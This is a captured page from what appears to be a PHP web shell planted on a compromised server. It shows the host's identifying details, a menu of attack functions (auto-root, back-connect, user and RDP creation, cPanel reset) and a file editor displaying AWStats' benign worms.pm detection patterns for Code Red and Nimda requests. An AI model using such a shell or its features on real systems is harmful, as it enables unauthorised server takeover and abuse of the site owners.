Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
awstats /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
blacklist.txt
57.34
KB
-rw-r--r--
browsers.pm
22.1
KB
-rw-r--r--
browsers_phone.pm
40.83
KB
-rw-r--r--
domains.pm
5.85
KB
-rw-r--r--
mime.pm
6.5
KB
-rw-r--r--
operating_systems.pm
26.91
KB
-rw-r--r--
referer_spam.pm
1.1
KB
-rw-r--r--
robots.pm
76.36
KB
-rw-r--r--
search_engines.pm
328.77
KB
-rw-r--r--
status_http.pm
4.02
KB
-rw-r--r--
status_smtp.pm
6.77
KB
-rw-r--r--
worms.pm
2.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worms.pm
# AWSTATS WORMS ADATABASE #----------------------------------------------------------------------------- # If you want to add worms to extend AWStats database detection capabilities, # you must add an entry in WormsSearchIDOrder, WormsHashID and WormsHashLib. #----------------------------------------------------------------------------- #package AWSWORMS; # WormsSearchIDOrder # This list is used to know in which order to search Worm IDs. # This array is array of Worms matching criteria found in URL submitted # to web server. This is a not case sensitive ID. #----------------------------------------------------------------------------- @WormsSearchIDOrder = ( '\/default\.ida', '\/null\.idq', 'exe\?\/c\+dir', 'root\.exe', 'admin\.dll', '\/nsiislog\.dll', '\/sumthin', '\/winnt\/system32\/cmd\.exe', '\/_vti_inf\.html', '\/_vti_bin\/shtml\.exe\/_vti_rpc' ); # WormsHashID # Each Worms search ID is associated to a string that is unique name of worm. #----------------------------------------------------------------------------- %WormsHashID = ( '\/default\.ida','code_red', '\/null\.idq','code_red', 'exe\?\/c\+dir','nimda', 'root\.exe','nimda', 'admin\.dll','nimda', '\/nsiislog\.dll','mpex', '\/sumthin','sumthin', '\/winnt\/system32\/cmd\.exe','nimda', '\/_vti_inf\.html','unknown', '\/_vti_bin\/shtml\.exe\/_vti_rpc','unknown' #'/MSOffice/cltreq.asp' # Not a worm, a check by IE to see if discussion bar is turned on #'/_vti_bin/owssrv.dll' # Not a worm, a check by IE to see if discussion bar is turned on ); # WormsHashLib # Worms name list ('worm unique id in lower case','worm clear text') # Each unique ID string is associated to a label #----------------------------------------------------------------------------- %WormsHashLib = ( 'code_red','Code Red family worm', 'mpex','IIS Exploit worm', 'nimda','Nimda family worm', 'sumthin','Sumthin worm', 'unknown','Unknown worm' ); # WormsHashTarget # Worms target list ('worm unique id in lower case','worm target clear text') # Each unique ID string is associated to a target #----------------------------------------------------------------------------- %WormsHashTarget = ( 'code_red','IIS', 'mpex','IIS', 'nimda','IIS', 'sumthin','?', 'unknown','MS products', ); 1;
Close